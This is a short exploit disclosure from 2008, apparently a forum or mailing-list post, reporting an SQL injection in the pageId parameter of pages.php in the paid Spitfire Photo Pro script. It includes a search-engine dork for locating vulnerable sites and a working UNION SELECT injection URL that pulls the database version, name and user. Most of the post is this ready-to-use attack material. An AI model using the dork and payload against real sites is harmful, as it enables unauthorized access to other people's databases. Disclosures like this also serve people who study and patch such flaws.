################################################################

#

# Author: Beenu Arora

#

# Home : www.BeenuArora.com

#

# Email : beenudel1986 (at) gmail (dot) com [email concealed]

#

# Share the c0de!

#

################################################################

#

# Title: spitfirephoto Pro pages.php Sql Injection

#

# Vendor: http://http://www.spitfirephoto.com/ ( Paid Script )

#

#

###########################################################

#

# d0rk:Powered by Spitfire Photo Pro

#

###########################################################

Live Demo:

http://localhost/sapientphoto/pages.php?pageId=6634+and+1=2+union+select
+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())--

###########################################################

#

# Bug discovered : 30 Oct.2008

###########################################################

[ reply ]